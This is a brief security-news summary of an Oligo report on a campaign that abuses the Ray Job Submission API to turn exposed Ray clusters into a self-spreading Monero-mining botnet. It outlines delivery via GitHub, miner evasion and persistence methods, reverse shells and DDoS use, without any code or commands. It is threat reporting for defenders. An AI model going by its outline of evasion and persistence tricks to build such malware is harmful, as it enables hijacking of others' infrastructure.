Overview
- Oligo reports a renewed campaign converting publicly reachable Ray clusters into a self-propagating Monero-mining botnet, with the latest delivery wave operating from GitHub since November 17.
- An earlier phase using GitLab was disrupted on November 5 after takedowns, and GitHub said it removed violating accounts as attackers repeatedly spun up new repositories.
- Access is gained through the Ray Job Submission API and abuse of the framework’s own scheduling to deploy malware across nodes and between clusters, with large-scale target discovery observed via interact.sh callbacks.
- Payloads appear LLM-generated and install XMRig configured to cap CPU use at about 60%, hide GPU activity, persist via cron and systemd, disguise processes, and kill competing miners.
- Beyond cryptomining, the operation enables reverse shells for interactive control, data theft and lateral movement, and can launch DDoS attacks, all against a large attack surface of more than 200,000 exposed Ray servers.